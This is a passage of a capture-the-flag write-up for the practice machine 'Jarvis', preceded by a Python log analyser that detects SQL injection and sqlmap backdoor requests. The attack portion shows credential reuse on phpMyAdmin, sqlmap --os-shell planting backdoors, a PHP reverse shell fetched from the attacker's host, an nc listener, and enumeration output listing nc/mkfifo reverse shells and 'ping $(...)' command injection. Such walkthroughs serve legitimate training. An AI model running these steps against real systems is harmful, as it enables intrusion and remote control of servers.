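10.10.14.5 - - [10/Nov/2019:05:10:01 +0000] "GET /room.php?cod=1%20AND%201=2%20UNION%20SELECT%201,2,3,group_concat(user,0x3a,password),5,6,7%20from%20mysql.user%23 HTTP/1.1" 200 2080 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
10.10.14.5 - - [10/Nov/2019:05:21:23 +0000] "GET /tmpbstqd.php?cmd=whoami HTTP/1.1" 200 31 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
10.10.14.9 - - [10/Nov/2019:05:30:00 +0000] "GET /room.php?cod=3 HTTP/1.1" 200 2140 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
'''

# Apache combined log format: ip ident user [ts] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Payload shapes seen in this writeup, matched against the URL-decoded query string.
SQLI_RULES = {
    "tautology": re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I),
    "time-based": re.compile(r"\bSLEEP\s*\(", re.I),
    "union-select": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "file-read": re.compile(r"\bLOAD_FILE\s*\(", re.I),
    "file-write": re.compile(r"\bINTO\s+(OUT|DUMP)FILE\b", re.I),
    "mysql.user": re.compile(r"\bmysql\.user\b", re.I),
}
# sqlmap's stager/backdoor names as they appear in this writeup: tmpu/tmpb + 4 lowercase letters.
STAGER_RE = re.compile(r"^/tmp[bu][a-z]{4}\.php$")
HEX_RE = re.compile(r"0x([0-9a-fA-F]{2,})")
# Assumption about the app: room.php's id parameter is legitimately always an integer.
NUMERIC_PARAMS = {"cod"}


def decode_hex_literals(s):
    """Decode MySQL 0x... string literals; sqlmap wraps extracted data in such markers."""
    out = []
    for h in HEX_RE.findall(s):
        if len(h) % 2:
            continue
        try:
            out.append(bytes.fromhex(h).decode("ascii"))
        except ValueError:  # UnicodeDecodeError is a ValueError
            out.append("<non-ascii %d bytes>" % (len(h) // 2))
    return out


def inspect_request(ip, target, ua):
    """Return a finding dict for one request; 'reasons' is empty when nothing matched."""
    url = urlsplit(target)
    query = unquote_plus(url.query)
    reasons = []
    if "sqlmap" in ua.lower():
        reasons.append("sqlmap user-agent")
    if STAGER_RE.match(url.path):
        reasons.append("request to sqlmap-style stager/backdoor name")
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not value.strip().lstrip("-").isdigit():
            reasons.append("non-numeric value for %s" % name)
    for label, rx in SQLI_RULES.items():
        if rx.search(query):
            reasons.append(label)
    return {"ip": ip, "path": url.path, "query": query, "reasons": reasons,
            "hex_literals": decode_hex_literals(query)}


def analyze_log(text):
    """Parse each log line and keep only the requests that triggered at least one rule."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # malformed line; a real pipeline would count these
        finding = inspect_request(m["ip"], m["target"], m["ua"])
        if finding["reasons"]:
            finding["ts"] = m["ts"]
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["path"], ", ".join(f["reasons"]), f["hex_literals"])
```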

Next, check whether the credential is reused elsewhere.

Then I tried these credentials (DBadmin : imissyou) with phpmyadmin and I got in:

http://10.10.10.143/phpmyadmin/index.php

username : DBadmin
password : imissyou

That works. Back on the attack box, prepare a PHP reverse shell:

root@kali:~/Downloads# cp /root/Downloads/SecLists/Web-Shells/laudanum-0.8/php/php-reverse-shell.php shell2.php

root@kali:~/Downloads# gedit shell2.php

$ip = '10.10.15.149'; // CHANGE THIS
$port = 8888; // CHANGE THIS

Save it and serve the directory over HTTP so the target can fetch it:

root@kali:~/Downloads# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 …

Now reopen the os-shell (this run also fetches the DBMS banner) and pull the reverse shell onto the web root:

root@kali:~/Downloads# sqlmap -u http://10.10.10.143/room.php?cod=3 --banner --batch -D hottel --os-shell

[*] starting @ 05:21:16 /2019-11-10/

[05:21:16] [INFO] resuming back-end DBMS ‘mysql’
[05:21:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

Parameter: cod (GET)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: cod=1 AND 9798=9798

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cod=1 AND (SELECT 5908 FROM (SELECT(SLEEP(5)))ROhK)

Type: UNION query
Title: Generic UNION query (NULL) – 7 columns
Payload: cod=-7912 UNION ALL SELECT NULL,NULL,CONCAT(0x7162716a71,0x716953596742754675626445567968597243474972654775745258747a77774f65596862794c504e,0x71706a6b71),NULL,NULL,NULL,NULL-- jhLu

[05:21:17] [INFO] the back-end DBMS is MySQL
[05:21:17] [INFO] fetching banner
web server operating system: Linux Debian 9.0 (stretch)
web application technology: PHP, Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
banner: ‘10.1.37-MariaDB-0+deb9u1’
[05:21:17] [INFO] going to use a web backdoor for command prompt
[05:21:17] [INFO] fingerprinting the back-end DBMS operating system
[05:21:18] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[05:21:18] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) (‘/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs’) (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[05:21:18] [INFO] retrieved web server absolute paths: ‘/images/’
[05:21:18] [INFO] trying to upload the file stager on ‘/var/www/’ via LIMIT ‘LINES TERMINATED BY’ method
[05:21:19] [WARNING] unable to upload the file stager on ‘/var/www/’
[05:21:19] [INFO] trying to upload the file stager on ‘/var/www/’ via UNION method
[05:21:19] [WARNING] expect junk characters inside the file as a leftover from UNION query
[05:21:20] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[05:21:21] [INFO] trying to upload the file stager on ‘/var/www/html/’ via LIMIT ‘LINES TERMINATED BY’ method
[05:21:22] [INFO] the file stager has been successfully uploaded on ‘/var/www/html/’ – http://10.10.10.143:80/tmpuwsaq.php
[05:21:23] [INFO] the backdoor has been successfully uploaded on ‘/var/www/html/’ – http://10.10.10.143:80/tmpbstqd.php
[05:21:23] [INFO] calling OS shell. To quit type ‘x’ or ‘q’ and press ENTER
os-shell>

os-shell> wget 10.10.15.149/shell2.php
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output:

–2019-11-10 00:29:32– http://10.10.15.149/shell2.php
Connecting to 10.10.15.149:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 5490 (5.4K) [application/octet-stream]
Saving to: ‘shell2.php’

0K ….. 100% 579M=0s

2019-11-10 00:29:33 (579 MB/s) – ‘shell2.php’ saved [5490/5490]

In a second terminal, start a listener on the port set in shell2.php:

root@kali:~/Downloads# nc -lvnp 8888
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888

Then request the uploaded file in the browser:

http://jarvis.htb/shell3.php

The listener receives the connection:

root@kali:~/Downloads# nc -lvnp 8888
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 10.10.10.143.
Ncat: Connection from 10.10.10.143:35918.
Linux jarvis 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
00:38:12 up 5:54, 0 users, load average: 0.01, 0.04, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@jarvis:/$

www-data@jarvis:/$ ls
ls
bin home lib32 mnt run tmp vmlinuz.old
boot initrd.img lib64 opt sbin usr
dev initrd.img.old lost+found proc srv var
etc lib media root sys vmlinuz

www-data@jarvis:/$ cd /var/www/html
cd /var/www/html
www-data@jarvis:/var/www/html$ ls
ls
LinEnum.sh livin.php shell.php tmpueihb.php
ayax nav.php shell2.php tmpugxsc.php
b4nn3d pearly1.php shell2.php.1 tmpupqpe.php
connection.php php-reverse-shell.php shell3.php tmpuqweo.php
css phpmyadmin shellme.html tmpurlvi.php
dining-bar.php room.php shellme.sh tmpusyia.php
fonts roomobj.php tmpbceag.php tmpuujwn.php
footer.php rooms-suites.php tmpbstqd.php tmpuumez.php
getfileayax.php s.php tmpbujgl.php tmpuvpbk.php
gg.php santa.php tmpbviua.php tmpuwsaq.php
gg1.php sass tmpbxjzt.php vanathi.php
images sh3ll.php tmpbyehx.php
index.php sh3ll1.php tmpbzfws.php
js sh3ll2.php tmpubygk.php

www-data@jarvis:/var/www/html$ chmod +x LinEnum.sh
chmod +x LinEnum.sh
www-data@jarvis:/var/www/html$ ./LinEnum.sh
./LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.98

[-] Debug Info
[+] Thorough tests = Disabled

Scan started at:
Sun Nov 10 00:41:06 EST 2019

### SYSTEM ##############################################
[-] Kernel information:
Linux jarvis 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux

[-] Kernel information (continued):
Linux version 4.9.0-8-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.144-3.1 (2019-02-19)

[-] Specific release information:
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
NAME="Debian GNU/Linux"
VERSION_ID="9"
VERSION="9 (stretch)"
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

[-] Hostname:
jarvis

### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[-] Users that have previously logged onto the system:
Username Port From Latest
root tty1 Wed Aug 7 08:13:17 -0400 2019
pepper pts/0 172.16.204.1 Tue Mar 5 10:23:48 -0500 2019
oscp987 tty1 Wed Aug 7 08:13:17 -0400 2019
oscp876 tty1 Wed Aug 7 08:13:17 -0400 2019

[-] Who else is logged on:
00:41:06 up 5:57, 0 users, load average: 0.03, 0.04, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)
uid=106(mysql) gid=112(mysql) groups=112(mysql)
uid=107(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)

[+] It looks like we have password hashes in /etc/passwd!
oscp987://ylENbU061xPB.UxzDd0:0:0:/root:/bin/bash
oscp876:$1$oscp876$j//ylENbU061xPB.UxzDd0:0:0:/root:/bin/bash

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
pepper:x:1000:1000:,,,:/home/pepper:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
oscp987://ylENbU061xPB.UxzDd0:0:0:/root:/bin/bash
oscp876:$1$oscp876$j//ylENbU061xPB.UxzDd0:0:0:/root:/bin/bash

[-] Super user account(s):
root
oscp987
oscp876

[+] We can sudo without supplying a password!
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py

[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4.0K Mar 2 2019 .
drwxr-xr-x 23 root root 4.0K Mar 3 2019 ..
drwxr-xr-x 4 pepper pepper 4.0K Nov 10 00:37 pepper

### ENVIRONMENTAL #######################################
[-] Environment information:
APACHE_LOG_DIR=/var/log/apache2
LANG=C
OLDPWD=/
INVOCATION_ID=3373a0757ac942419c7eb85dc3cc1caa
APACHE_LOCK_DIR=/var/lock/apache2
PWD=/var/www/html
JOURNAL_STREAM=8:12893
APACHE_RUN_GROUP=www-data
APACHE_RUN_DIR=/var/run/apache2
APACHE_RUN_USER=www-data
APACHE_PID_FILE=/var/run/apache2/apache2.pid
SHLVL=2
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
_=/usr/bin/env

[-] Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash

[-] Current umask value:
0000
u=rwx,g=rwx,o=rwx

[-] umask value as specified in /etc/login.defs:
UMASK 022

[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512

### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root 722 Oct 7 2017 /etc/crontab

/etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 Mar 2 2019 .
drwxr-xr-x 80 root root 4096 Aug 7 08:14 ..
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
-rw-r--r-- 1 root root 712 Jan 1 2017 php

/etc/cron.daily:
total 44
drwxr-xr-x 2 root root 4096 Mar 4 2019 .
drwxr-xr-x 80 root root 4096 Aug 7 08:14 ..
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
-rwxr-xr-x 1 root root 539 Nov 3 2018 apache2
-rwxr-xr-x 1 root root 1474 Jan 18 2019 apt-compat
-rwxr-xr-x 1 root root 355 Oct 25 2016 bsdmainutils
-rwxr-xr-x 1 root root 1597 Jun 25 2018 dpkg
-rwxr-xr-x 1 root root 2211 Apr 13 2014 locate
-rwxr-xr-x 1 root root 89 May 5 2015 logrotate
-rwxr-xr-x 1 root root 1065 Dec 13 2016 man-db
-rwxr-xr-x 1 root root 249 May 17 2017 passwd

/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Mar 2 2019 .
drwxr-xr-x 80 root root 4096 Aug 7 08:14 ..
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Mar 2 2019 .
drwxr-xr-x 80 root root 4096 Aug 7 08:14 ..
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder

/etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 Mar 2 2019 .
drwxr-xr-x 80 root root 4096 Aug 7 08:14 ..
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder
-rwxr-xr-x 1 root root 723 Dec 13 2016 man-db

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

### NETWORKING ##########################################
[-] Network and IP info:
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:50:56:bd:52:e1 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.143/24 brd 10.10.10.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:febd:52e1/64 scope global mngtmpaddr dynamic
valid_lft 86247sec preferred_lft 14247sec
inet6 fe80::250:56ff:febd:52e1/64 scope link
valid_lft forever preferred_lft forever

[-] ARP history:
10.10.10.2 dev ens33 lladdr 00:50:56:bd:e2:c6 REACHABLE
fe80::250:56ff:febd:e2c6 dev ens33 lladdr 00:50:56:bd:e2:c6 router STALE

[-] Nameserver(s):
nameserver 1.1.1.1

[-] Nameserver(s):
Global
DNS Servers: 1.1.1.1
DNS Domain: localdomain
DNSSEC NTA: 10.in-addr.arpa
16.172.in-addr.arpa
168.192.in-addr.arpa
17.172.in-addr.arpa
18.172.in-addr.arpa
19.172.in-addr.arpa
20.172.in-addr.arpa
21.172.in-addr.arpa
22.172.in-addr.arpa
23.172.in-addr.arpa
24.172.in-addr.arpa
25.172.in-addr.arpa
26.172.in-addr.arpa
27.172.in-addr.arpa
28.172.in-addr.arpa
29.172.in-addr.arpa
30.172.in-addr.arpa
31.172.in-addr.arpa
corp
d.f.ip6.arpa
home
internal
intranet
lan
local
private
test

Link 2 (ens33)
Current Scopes: LLMNR/IPv4 LLMNR/IPv6
LLMNR setting: yes
MulticastDNS setting: no
DNSSEC setting: no
DNSSEC supported: no

[-] Default route:
default via 10.10.10.2 dev ens33 onlink

[-] Listening TCP:
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 80 127.0.0.1:3306 *:*
LISTEN 0 128 *:5355 *:*
LISTEN 0 128 *:22 *:*
LISTEN 0 128 :::64999 :::*
LISTEN 0 128 :::5355 :::*
LISTEN 0 128 :::80 :::*
LISTEN 0 128 :::22 :::*

[-] Listening UDP:
State Recv-Q Send-Q Local Address:Port Peer Address:Port
UNCONN 0 0 127.0.0.53%lo:53 *:*
UNCONN 0 0 *:5355 *:*
UNCONN 0 0 :::5355 :::*

### SERVICES #############################################
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.6 139000 6856 ? Ss Nov09 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S Nov09 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S Nov09 0:04 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< Nov09 0:00 [kworker/0:0H]
root 7 0.0 0.0 0 0 ? S Nov09 0:01 [rcu_sched]
root 8 0.0 0.0 0 0 ? S Nov09 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S Nov09 0:00 [migration/0]
root 10 0.0 0.0 0 0 ? S< Nov09 0:00 [lru-add-drain]
root 11 0.0 0.0 0 0 ? S Nov09 0:00 [watchdog/0]
root 12 0.0 0.0 0 0 ? S Nov09 0:00 [cpuhp/0]
root 13 0.0 0.0 0 0 ? S Nov09 0:00 [kdevtmpfs]
root 14 0.0 0.0 0 0 ? S< Nov09 0:00 [netns]
root 15 0.0 0.0 0 0 ? S Nov09 0:00 [khungtaskd]
root 16 0.0 0.0 0 0 ? S Nov09 0:00 [oom_reaper]
root 17 0.0 0.0 0 0 ? S< Nov09 0:00 [writeback]
root 18 0.0 0.0 0 0 ? S Nov09 0:00 [kcompactd0]
root 19 0.0 0.0 0 0 ? SN Nov09 0:00 [ksmd]
root 21 0.0 0.0 0 0 ? SN Nov09 0:00 [khugepaged]
root 22 0.0 0.0 0 0 ? S< Nov09 0:00 [crypto]
root 23 0.0 0.0 0 0 ? S< Nov09 0:00 [kintegrityd]
root 24 0.0 0.0 0 0 ? S< Nov09 0:00 [bioset]
root 25 0.0 0.0 0 0 ? S< Nov09 0:00 [kblockd]
root 26 0.0 0.0 0 0 ? S< Nov09 0:00 [devfreq_wq]
root 27 0.0 0.0 0 0 ? S< Nov09 0:00 [watchdogd]
root 28 0.0 0.0 0 0 ? S Nov09 0:00 [kswapd0]
root 29 0.0 0.0 0 0 ? S< Nov09 0:00 [vmstat]
root 41 0.0 0.0 0 0 ? S< Nov09 0:00 [kthrotld]
root 42 0.0 0.0 0 0 ? S< Nov09 0:00 [ipv6_addrconf]
root 85 0.0 0.0 0 0 ? S< Nov09 0:00 [ata_sff]
root 86 0.0 0.0 0 0 ? S< Nov09 0:00 [mpt_poll_0]
root 87 0.0 0.0 0 0 ? S< Nov09 0:00 [mpt/0]
root 114 0.0 0.0 0 0 ? S Nov09 0:00 [scsi_eh_0]
root 115 0.0 0.0 0 0 ? S< Nov09 0:00 [scsi_tmf_0]
root 117 0.0 0.0 0 0 ? S< Nov09 0:00 [bioset]
root 118 0.0 0.0 0 0 ? S Nov09 0:00 [scsi_eh_1]
root 120 0.0 0.0 0 0 ? S< Nov09 0:00 [scsi_tmf_1]
root 122 0.0 0.0 0 0 ? S Nov09 0:00 [scsi_eh_2]
root 124 0.0 0.0 0 0 ? S< Nov09 0:00 [scsi_tmf_2]
root 138 0.0 0.0 0 0 ? S< Nov09 0:00 [bioset]
root 140 0.0 0.0 0 0 ? S< Nov09 0:00 [kworker/0:1H]
root 165 0.0 0.0 0 0 ? S< Nov09 0:00 [kworker/u257:0]
root 172 0.0 0.0 0 0 ? S Nov09 0:00 [jbd2/sda1-8]
root 173 0.0 0.0 0 0 ? S< Nov09 0:00 [ext4-rsv-conver]
root 195 0.0 0.4 56800 4912 ? Ss Nov09 0:00 /lib/systemd/systemd-journald
root 200 0.0 1.0 207512 10544 ? Ssl Nov09 0:09 /usr/bin/vmtoolsd
root 201 0.0 0.0 0 0 ? S Nov09 0:00 [kauditd]
root 231 0.0 0.3 45600 3692 ? Ss Nov09 0:00 /lib/systemd/systemd-udevd
root 340 0.0 0.0 0 0 ? S< Nov09 0:00 [ttm_swap]
systemd+ 361 0.0 0.4 127284 4032 ? Ssl Nov09 0:01 /lib/systemd/systemd-timesyncd
root 386 0.0 0.2 37980 2148 ? Ss Nov09 0:00 /lib/systemd/systemd-logind
root 387 0.0 0.2 29664 2768 ? Ss Nov09 0:00 /usr/sbin/cron -f
message+ 389 0.0 0.3 45116 3888 ? Ss Nov09 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 401 0.0 2.6 229376 26680 ? Ss Nov09 0:00 php-fpm: master process (/etc/php/7.0/fpm/php-fpm.conf)
root 404 0.0 1.8 153488 18280 ? Ss Nov09 0:00 /usr/bin/VGAuthService
root 405 0.0 0.3 250112 3176 ? Ssl Nov09 0:00 /usr/sbin/rsyslogd -n
root 406 0.5 1.7 211524 17172 ? Ss Nov09 1:59 python3 /root/sqli_defender.py
root 417 0.0 0.1 14524 1636 tty1 Ss+ Nov09 0:00 /sbin/agetty --noclear tty1 linux
root 451 0.0 0.0 0 0 ? S< Nov09 0:00 [edac-poller]
www-data 466 0.0 0.6 229376 6416 ? S Nov09 0:00 php-fpm: pool www
www-data 467 0.0 0.6 229376 6416 ? S Nov09 0:00 php-fpm: pool www
mysql 590 0.0 8.9 655428 89656 ? Ssl Nov09 0:07 /usr/sbin/mysqld
root 603 0.0 0.6 69952 6464 ? Ss Nov09 0:00 /usr/sbin/sshd -D
root 634 0.0 2.5 271396 25764 ? Ss Nov09 0:00 /usr/sbin/apache2 -k start
www-data 667 0.0 2.1 273820 21720 ? S Nov09 0:00 /usr/sbin/apache2 -k start
www-data 669 0.0 2.1 273888 21924 ? S Nov09 0:00 /usr/sbin/apache2 -k start
www-data 814 0.0 1.7 273788 18000 ? S Nov09 0:00 /usr/sbin/apache2 -k start
www-data 848 0.0 1.8 273788 18984 ? S Nov09 0:00 /usr/sbin/apache2 -k start
www-data 909 0.0 0.0 4276 744 ? S Nov09 0:00 sh -c nc 10.10.15.71 1111 -e /bin/bash
www-data 910 0.0 0.2 17940 2816 ? S Nov09 0:00 bash
www-data 911 0.0 0.6 32176 6912 ? S Nov09 0:00 python -c import pty; pty.spawn("/bin/sh")
www-data 912 0.0 0.0 4276 772 pts/1 Ss+ Nov09 0:00 /bin/sh
www-data 918 0.0 0.0 4276 740 ? S Nov09 0:00 sh -c nc 10.10.15.71 1111 -e /bin/bash
www-data 919 0.0 0.2 17940 2744 ? S Nov09 0:00 bash
www-data 925 0.0 0.6 32176 6800 ? S Nov09 0:00 python -c import pty; pty.spawn("/bin/sh")
www-data 926 0.0 0.1 4276 1428 pts/2 Ss Nov09 0:00 /bin/sh
www-data 992 0.0 0.3 28976 3180 pts/2 S Nov09 0:17 vi
www-data 994 0.0 0.0 4276 748 pts/2 S Nov09 0:00 sh -c bash
www-data 995 0.0 0.3 18164 3240 pts/2 S Nov09 0:00 bash
www-data 999 0.0 1.3 272060 13564 ? S Nov09 0:00 /usr/sbin/apache2 -k start
root 1127 0.0 0.3 47608 3192 pts/2 S+ Nov09 0:00 sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
pepper 1128 0.0 0.9 26048 9260 pts/2 S+ Nov09 0:00 python3 /var/www/Admin-Utilities/simpler.py -p
pepper 1129 0.0 0.0 4276 708 pts/2 S+ Nov09 0:00 sh -c ping $(/tmp/i.sh)
pepper 1130 0.0 0.0 4276 724 pts/2 S+ Nov09 0:00 /bin/sh /tmp/i.sh
pepper 1131 0.0 0.2 9484 2548 pts/2 S+ Nov09 0:00 bash
pepper 1132 0.0 0.6 32176 6652 pts/2 S+ Nov09 0:00 python -c import pty; pty.spawn("/bin/sh")
pepper 1133 0.0 0.0 4276 748 pts/0 Ss+ Nov09 0:00 /bin/sh
www-data 1142 0.0 0.0 4276 760 ? S Nov09 0:00 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.251 1234 >/tmp/f
www-data 1146 0.0 0.0 4276 696 ? S Nov09 0:00 /bin/sh -i
www-data 1148 0.0 0.6 32176 6940 ? S Nov09 0:00 python -c import pty;pty.spawn('/bin/bash')
www-data 1149 0.0 0.3 18164 3312 pts/3 Ss Nov09 0:00 /bin/bash
root 1161 0.0 0.3 47608 3212 pts/3 S Nov09 0:00 sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
pepper 1162 0.0 0.9 26044 9180 pts/3 S Nov09 0:00 python3 /var/www/Admin-Utilities/simpler.py -p
pepper 1163 0.0 0.0 4276 736 pts/3 S Nov09 0:00 sh -c ping $(bash)
